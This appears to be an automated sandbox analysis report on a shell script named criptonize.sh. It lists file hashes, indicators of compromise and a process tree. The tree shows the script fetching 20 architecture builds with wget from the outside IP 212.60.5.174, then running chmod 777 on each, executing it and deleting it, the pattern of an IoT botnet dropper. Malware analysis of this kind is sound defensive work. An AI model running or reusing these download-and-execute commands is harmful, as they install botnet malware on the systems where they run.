Resubmissions
27-08-2024 23:50
240827-3vw9rsxdrg 827-08-2024 23:49
240827-3t1wkaxdpd 827-08-2024 23:47
240827-3svyxsxdlf 827-08-2024 23:45
240827-3rvlrsxdjc 3
Analysis
-
max time kernel
61s -
max time network
65s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhf image:debian9-armhf-20240611-en kernel:4.9.0-13-armmp-lpae locale:en-us os:debian-9-armhf system -
submitted
27-08-2024 23:45
Static task
static1
Behavioral task
behavioral1
Sample
criptonize.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
criptonize.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
criptonize.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
criptonize.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
criptonize.sh
-
Size
9KB
-
MD5
fe5b1cae588f9ad418e162262b65b865
-
SHA1
c0ab765270f811bcdbb0ad9f4ed2871edcf58caf
-
SHA256
5231c1a078c018a6abea6fadde67300a961c9b528743464806246a3be619b405
-
SHA512
b9c079cbb03cc31ba0163dbfe3d9a8fda594010717f48d29880496e31b3852fb90423e6291b1697e09c52d72f6bd1f4405021aa63d652a0c96853fff25055774
-
SSDEEP
96:rK7IcSgf29gv+1XVYmm6Wdw9Iu8f/s2CIjTgSWuI:cERlnySeZy
Malware Config
Signatures
-
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory. In this trace the 20 IoCs are the wget downloads: the script does not select a build with uname, it blindly iterates over 20 architecture builds (x86_64, i686, i586, i486, aarch64, armv7l/v6l/v5l/v4eb/v4tl/v4l, mips64, mips, mipsel, powerpc, m68k, sh4, sparc, arc700 and even a FreeBSD bsdamd64 build) and for each one removes any stale copy, fetches the binary over plaintext HTTP from 212.60.5.174, makes it world-writable and executable (chmod 777), runs it with the architecture name as its only argument, and deletes it again — the loop typical of multi-architecture IoT botnet droppers, which leaves no payload on disk once it has run. The report shows no child processes or network activity from the executed binaries, so it cannot be concluded from this view which of the builds actually ran on the debian-9 armhf guest; the "rm / wget into /tmp / chmod 777 / execute from /tmp / rm" sequence is itself a high-confidence detection pattern regardless.
description | ioc | Process
File opened for modification | /tmp/criptonize.sh4 | wget
File opened for modification | /tmp/criptonize.armv6l | wget
File opened for modification | /tmp/criptonize.powerpc | wget
File opened for modification | /tmp/criptonize.mips | wget
File opened for modification | /tmp/criptonize.mipsel | wget
File opened for modification | /tmp/criptonize.m68k | wget
File opened for modification | /tmp/criptonize.arc700 | wget
File opened for modification | /tmp/criptonize.aarch64 | wget
File opened for modification | /tmp/criptonize.armv4l | wget
File opened for modification | /tmp/criptonize.i486 | wget
File opened for modification | /tmp/criptonize.armv5l | wget
File opened for modification | /tmp/criptonize.armv4tl | wget
File opened for modification | /tmp/criptonize.mips64 | wget
File opened for modification | /tmp/criptonize.bsdamd64 | wget
File opened for modification | /tmp/criptonize.x86_64 | wget
File opened for modification | /tmp/criptonize.i586 | wget
File opened for modification | /tmp/criptonize.armv4eb | wget
File opened for modification | /tmp/criptonize.sparc | wget
File opened for modification | /tmp/criptonize.i686 | wget
File opened for modification | /tmp/criptonize.armv7l | wget
Processes
-
/tmp/criptonize.sh — `/tmp/criptonize.sh` (tree level 1) — PID:666
-
- /bin/rm — `rm -f criptonize.x86_64` (level 2) — PID:667
- /usr/bin/wget — `wget -O criptonize.x86_64 http://212.60.5.174/criptonize.x86_64` (level 2) — Writes file to tmp directory — PID:670
- /bin/chmod — `chmod 777 criptonize.x86_64` (level 2) — PID:698
- /tmp/criptonize.x86_64 — `./criptonize.x86_64 x86_64` (level 2) — PID:699
- /bin/rm — `rm -f criptonize.x86_64` (level 2) — PID:701
-
-
- /bin/rm — `rm -f criptonize.i686` (level 2) — PID:702
- /usr/bin/wget — `wget -O criptonize.i686 http://212.60.5.174/criptonize.i686` (level 2) — Writes file to tmp directory — PID:703
- /bin/chmod — `chmod 777 criptonize.i686` (level 2) — PID:704
- /tmp/criptonize.i686 — `./criptonize.i686 i686` (level 2) — PID:705
- /bin/rm — `rm -f criptonize.i686` (level 2) — PID:707
-
-
- /bin/rm — `rm -f criptonize.i586` (level 2) — PID:708
- /usr/bin/wget — `wget -O criptonize.i586 http://212.60.5.174/criptonize.i586` (level 2) — Writes file to tmp directory — PID:709
- /bin/chmod — `chmod 777 criptonize.i586` (level 2) — PID:740
- /tmp/criptonize.i586 — `./criptonize.i586 i586` (level 2) — PID:741
- /bin/rm — `rm -f criptonize.i586` (level 2) — PID:745
-
-
- /bin/rm — `rm -f criptonize.i486` (level 2) — PID:746
- /usr/bin/wget — `wget -O criptonize.i486 http://212.60.5.174/criptonize.i486` (level 2) — Writes file to tmp directory — PID:748
- /bin/chmod — `chmod 777 criptonize.i486` (level 2) — PID:756
- /tmp/criptonize.i486 — `./criptonize.i486 i486` (level 2) — PID:757
- /bin/rm — `rm -f criptonize.i486` (level 2) — PID:760
-
-
- /bin/rm — `rm -f criptonize.aarch64` (level 2) — PID:761
- /usr/bin/wget — `wget -O criptonize.aarch64 http://212.60.5.174/criptonize.aarch64` (level 2) — Writes file to tmp directory — PID:762
- /bin/chmod — `chmod 777 criptonize.aarch64` (level 2) — PID:780
- /tmp/criptonize.aarch64 — `./criptonize.aarch64 aarch64` (level 2) — PID:781
- /bin/rm — `rm -f criptonize.aarch64` (level 2) — PID:783
-
-
- /bin/rm — `rm -f criptonize.armv7l` (level 2) — PID:785
- /usr/bin/wget — `wget -O criptonize.armv7l http://212.60.5.174/criptonize.armv7l` (level 2) — Writes file to tmp directory — PID:786
- /bin/chmod — `chmod 777 criptonize.armv7l` (level 2) — PID:804
- /tmp/criptonize.armv7l — `./criptonize.armv7l armv7l` (level 2) — PID:806
- /bin/rm — `rm -f criptonize.armv7l` (level 2) — PID:807
-
-
- /bin/rm — `rm -f criptonize.armv6l` (level 2) — PID:808
- /usr/bin/wget — `wget -O criptonize.armv6l http://212.60.5.174/criptonize.armv6l` (level 2) — Writes file to tmp directory — PID:810
- /bin/chmod — `chmod 777 criptonize.armv6l` (level 2) — PID:811
- /tmp/criptonize.armv6l — `./criptonize.armv6l armv6l` (level 2) — PID:812
- /bin/rm — `rm -f criptonize.armv6l` (level 2) — PID:813
-
-
- /bin/rm — `rm -f criptonize.armv5l` (level 2) — PID:814
- /usr/bin/wget — `wget -O criptonize.armv5l http://212.60.5.174/criptonize.armv5l` (level 2) — Writes file to tmp directory — PID:815
- /bin/chmod — `chmod 777 criptonize.armv5l` (level 2) — PID:816
- /tmp/criptonize.armv5l — `./criptonize.armv5l armv5l` (level 2) — PID:817
- /bin/rm — `rm -f criptonize.armv5l` (level 2) — PID:818
-
-
- /bin/rm — `rm -f criptonize.armv4eb` (level 2) — PID:819
- /usr/bin/wget — `wget -O criptonize.armv4eb http://212.60.5.174/criptonize.armv4eb` (level 2) — Writes file to tmp directory — PID:820
- /bin/chmod — `chmod 777 criptonize.armv4eb` (level 2) — PID:821
- /tmp/criptonize.armv4eb — `./criptonize.armv4eb armv4eb` (level 2) — PID:822
- /bin/rm — `rm -f criptonize.armv4eb` (level 2) — PID:824
-
-
- /bin/rm — `rm -f criptonize.armv4tl` (level 2) — PID:825
- /usr/bin/wget — `wget -O criptonize.armv4tl http://212.60.5.174/criptonize.armv4tl` (level 2) — Writes file to tmp directory — PID:826
- /bin/chmod — `chmod 777 criptonize.armv4tl` (level 2) — PID:827
- /tmp/criptonize.armv4tl — `./criptonize.armv4tl armv4tl` (level 2) — PID:828
- /bin/rm — `rm -f criptonize.armv4tl` (level 2) — PID:829
-
-
- /bin/rm — `rm -f criptonize.armv4l` (level 2) — PID:830
- /usr/bin/wget — `wget -O criptonize.armv4l http://212.60.5.174/criptonize.armv4l` (level 2) — Writes file to tmp directory — PID:831
- /bin/chmod — `chmod 777 criptonize.armv4l` (level 2) — PID:835
- /tmp/criptonize.armv4l — `./criptonize.armv4l armv4l` (level 2) — PID:836
- /bin/rm — `rm -f criptonize.armv4l` (level 2) — PID:837
-
-
- /bin/rm — `rm -f criptonize.mips64` (level 2) — PID:838
- /usr/bin/wget — `wget -O criptonize.mips64 http://212.60.5.174/criptonize.mips64` (level 2) — Writes file to tmp directory — PID:839
- /bin/chmod — `chmod 777 criptonize.mips64` (level 2) — PID:842
- /tmp/criptonize.mips64 — `./criptonize.mips64 mips64` (level 2) — PID:843
- /bin/rm — `rm -f criptonize.mips64` (level 2) — PID:845
-
-
- /bin/rm — `rm -f criptonize.mips` (level 2) — PID:846
- /usr/bin/wget — `wget -O criptonize.mips http://212.60.5.174/criptonize.mips` (level 2) — Writes file to tmp directory — PID:847
- /bin/chmod — `chmod 777 criptonize.mips` (level 2) — PID:848
- /tmp/criptonize.mips — `./criptonize.mips mips` (level 2) — PID:849
- /bin/rm — `rm -f criptonize.mips` (level 2) — PID:851
-
-
- /bin/rm — `rm -f criptonize.mipsel` (level 2) — PID:852
- /usr/bin/wget — `wget -O criptonize.mipsel http://212.60.5.174/criptonize.mipsel` (level 2) — Writes file to tmp directory — PID:853
- /bin/chmod — `chmod 777 criptonize.mipsel` (level 2) — PID:854
- /tmp/criptonize.mipsel — `./criptonize.mipsel mipsel` (level 2) — PID:855
- /bin/rm — `rm -f criptonize.mipsel` (level 2) — PID:857
-
-
- /bin/rm — `rm -f criptonize.powerpc` (level 2) — PID:858
- /usr/bin/wget — `wget -O criptonize.powerpc http://212.60.5.174/criptonize.powerpc` (level 2) — Writes file to tmp directory — PID:859
- /bin/chmod — `chmod 777 criptonize.powerpc` (level 2) — PID:860
- /tmp/criptonize.powerpc — `./criptonize.powerpc powerpc` (level 2) — PID:861
- /bin/rm — `rm -f criptonize.powerpc` (level 2) — PID:863
-
-
- /bin/rm — `rm -f criptonize.m68k` (level 2) — PID:864
- /usr/bin/wget — `wget -O criptonize.m68k http://212.60.5.174/criptonize.m68k` (level 2) — Writes file to tmp directory — PID:865
- /bin/chmod — `chmod 777 criptonize.m68k` (level 2) — PID:868
- /tmp/criptonize.m68k — `./criptonize.m68k m68k` (level 2) — PID:869
- /bin/rm — `rm -f criptonize.m68k` (level 2) — PID:871
-
-
- /bin/rm — `rm -f criptonize.sh4` (level 2) — PID:872
- /usr/bin/wget — `wget -O criptonize.sh4 http://212.60.5.174/criptonize.sh4` (level 2) — Writes file to tmp directory — PID:873
- /bin/chmod — `chmod 777 criptonize.sh4` (level 2) — PID:874
- /tmp/criptonize.sh4 — `./criptonize.sh4 sh4` (level 2) — PID:875
- /bin/rm — `rm -f criptonize.sh4` (level 2) — PID:877
-
-
- /bin/rm — `rm -f criptonize.sparc` (level 2) — PID:878
- /usr/bin/wget — `wget -O criptonize.sparc http://212.60.5.174/criptonize.sparc` (level 2) — Writes file to tmp directory — PID:879
- /bin/chmod — `chmod 777 criptonize.sparc` (level 2) — PID:880
- /tmp/criptonize.sparc — `./criptonize.sparc sparc` (level 2) — PID:881
- /bin/rm — `rm -f criptonize.sparc` (level 2) — PID:883
-
-
- /bin/rm — `rm -f criptonize.arc700` (level 2) — PID:884
- /usr/bin/wget — `wget -O criptonize.arc700 http://212.60.5.174/criptonize.arc700` (level 2) — Writes file to tmp directory — PID:885
- /bin/chmod — `chmod 777 criptonize.arc700` (level 2) — PID:886
- /tmp/criptonize.arc700 — `./criptonize.arc700 arc700` (level 2) — PID:887
- /bin/rm — `rm -f criptonize.arc700` (level 2) — PID:889
-
-
- /bin/rm — `rm -f criptonize.bsdamd64` (level 2) — PID:890
- /usr/bin/wget — `wget -O criptonize.bsdamd64 http://212.60.5.174/criptonize.bsdamd64` (level 2) — Writes file to tmp directory — PID:891
- /bin/chmod — `chmod 777 criptonize.bsdamd64` (level 2) — PID:894
- /tmp/criptonize.bsdamd64 — `./criptonize.bsdamd64 bsdamd64` (level 2) — PID:895
- /bin/rm — `rm -f criptonize.bsdamd64` (level 2) — PID:897
-